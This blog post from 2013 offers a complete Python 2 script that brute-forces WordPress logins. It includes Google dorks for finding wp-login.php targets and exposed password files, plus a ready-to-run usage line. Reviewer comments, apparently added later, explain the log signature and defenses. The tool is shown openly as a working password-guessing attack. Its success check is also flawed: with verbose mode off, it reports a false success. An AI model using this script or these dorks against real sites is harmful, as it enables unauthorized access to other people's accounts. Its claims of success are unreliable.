Saturday, January 19, 2013

Bruteforce wordpressbf.py, how to use Bruteforce wordpressbf.py on backtrack 5


brutewp

WordPressbf.py is a Python program that brute-forces passwords against a WordPress login page. Its effectiveness depends on the password list it is given, which the program reads in and reports as "Words Loaded".

How to Use

Test by Kng
dork target :               inurl:/wp-login.php
dork password:        inurl:/passwords.txt

–syntax

python wordpressbf.py http://target.com/wp-login.php admin passlistente.txt -v
brutewp1
001#!/usr/bin/python
002#WordPress Brute Force (wp-login.php)
   # Reviewer summary: Python 2 script (print statements, urllib2/httplib). It
   # reads a wordlist and submits one login POST per entry to the given
   # wp-login.php URL for a single username. Its main value to a defender is as
   # a reference for what password-guessing traffic against wp-login.php looks
   # like in web-server logs.
   # The three-digit prefixes are the listing's own line numbers, not program
   # text; the "line 97" mentioned below refers to those numbers.
003
004#If cookies enabled brute force will not work (yet)
005#Change response on line 97 if needed. (language)
006
007#Dork: inurl:wp-login.php
008
010#d3hydr8[at]gmail[dot]com
011
012import urllib2, sys, re, urllib, httplib, socket
013
014print "\n   d3hydr8[at]gmail[dot]com WordPressBF v1.0"
015print "----------------------------------------------"
016
   # Accept between three and six arguments after the script name; anything
   # else prints the usage text and exits with status 1.
017if len(sys.argv) not in [4,5,6,7]:
018    print "Usage: ./wordpressbf.py <site> <user> <wordlist> <options>\n"
019    print "\t   -p/-proxy <host:port> : Add proxy support"
020    print "\t   -v/-verbose : Verbose Mode\n"
021    sys.exit(1)
022
   # Scan the arguments for option flags. `proxy` and `verbose` are bound only
   # when their flag is present; the code that follows detects a missing flag
   # by catching NameError on the unbound name.
023for arg in sys.argv[1:]:
024    if arg.lower() == "-p" or arg.lower() == "-proxy":
           # The proxy value is the argument right after the flag: the flag's
           # index within argv[1:] plus 2 is the next position in sys.argv.
025        proxy = sys.argv[int(sys.argv[1:].index(arg))+2]
026    if arg.lower() == "-v" or arg.lower() == "-verbose":
027        verbose = 1
028
   # Optional proxy reachability test. When no proxy flag was given, reading
   # `proxy` raises NameError, which is how the "not given" case is detected.
   # Every failure path sets proxy = 0, the value the request loop checks to
   # decide whether to install an explicit proxy handler.
029try:
030    if proxy:
031        print "\n[+] Testing Proxy..."
           # Opens a plain TCP connection to host:port; no request is sent.
032        h2 = httplib.HTTPConnection(proxy)
033        h2.connect()
034        print "[+] Proxy:",proxy
035except(socket.timeout):
036    print "\n[-] Proxy Timed Out"
037    proxy = 0
038    pass
039except(NameError):
040    print "\n[-] Proxy Not Given"
041    proxy = 0
042    pass
   # Bare except: any other exception raised by the test lands here.
043except:
044    print "\n[-] Proxy Failed"
045    proxy = 0
046    pass
047
   # Same NameError idiom for the verbose flag: an unbound name means the
   # flag was not passed, so verbose is set to 0.
048try:
049    if verbose == 1:
050        print "[+] Verbose Mode On\n"
051except(NameError):
052    print "[-] Verbose Mode Off\n"
053    verbose = 0
054    pass
055
   # Normalise the first argument into `host`: "http://" is prepended unless
   # the argument already begins with exactly those seven characters.
056if sys.argv[1][:7] != "http://":
057    host = "http://"+sys.argv[1]
058else:
059    host = sys.argv[1]
060
061print "[+] BruteForcing:",host
062print "[+] User:",sys.argv[2]
063
   # Read the whole wordlist into memory as a list of lines. An IOError while
   # opening or reading it prints a message and exits with status 1.
064try:
065    words = open(sys.argv[3], "r").readlines()
066    print "[+] Words Loaded:",len(words),"\n"
067except(IOError):
068    print "[-] Error: Check your wordlist path\n"
069    sys.exit(1)
070
   # Main loop: one login POST per wordlist entry, sent sequentially with no
   # delay between attempts and a freshly built opener (no cookie handling)
   # each time.
   # Defender view: in access logs this appears as a rapid run of POST requests
   # to wp-login.php from one source address (the proxy's, when one is used),
   # all carrying the same `log` value. The script sets no request headers, so
   # urllib2's default Python-urllib User-Agent is sent. Failed-login rate
   # limiting or lockout, and multi-factor authentication, are the usual
   # controls against this pattern.
071for word in words:
       # Strip CR/LF so the candidate matches the wordlist entry exactly.
072    word = word.replace("\r","").replace("\n","")
       # Form fields posted to the login page: `log` is the username from
       # argv[2], `pwd` is the current candidate; the rest are fixed values.
073    login_form_seq = [
074        ('log', sys.argv[2]),
075        ('pwd', word),
076        ('rememberme', 'forever'),
077        ('wp-submit', 'Login >>'),
078        ('redirect_to', 'wp-admin/')]
079    login_form_data = urllib.urlencode(login_form_seq)
       # proxy is 0 when none was given or the earlier proxy test failed.
080    if proxy != 0:
081        proxy_handler = urllib2.ProxyHandler({'http': 'http://'+proxy+'/'})
082        opener = urllib2.build_opener(proxy_handler)
083    else:
084        opener = urllib2.build_opener()
085    try:
           # Passing a data argument makes urllib2 issue a POST.
086        site = opener.open(host, login_form_data).read()
087    except(urllib2.URLError), msg:
           # A URLError is printed and the response is treated as empty text.
088        print msg
089        site = ""
090        pass
091
       # Stop the run if the page reports that cookies are required.
092    if re.search("WordPress requires Cookies",site):
093        print "[-] Failed: WordPress has cookies enabled\n"
094        sys.exit(1)
095
096    #Change this response if different. (language)
       # NOTE(review): the outcome is inferred only from text in the response
       # body, so the tool's printed result is not authoritative. When this
       # output turns up in an investigation, confirm any claimed success
       # against the server's own authentication logs.
097    if re.search("<strong>ERROR</strong>",site) and verbose == 1:
098        print "[-] Login Failed:",word
099    else:
100        print "\n\t[!] Login Successfull:",sys.argv[2],word,"\n"
           # Exits with status 1 here too, the same status as the error paths.
101        sys.exit(1)
102print "\n[-] Brute Complete\n"


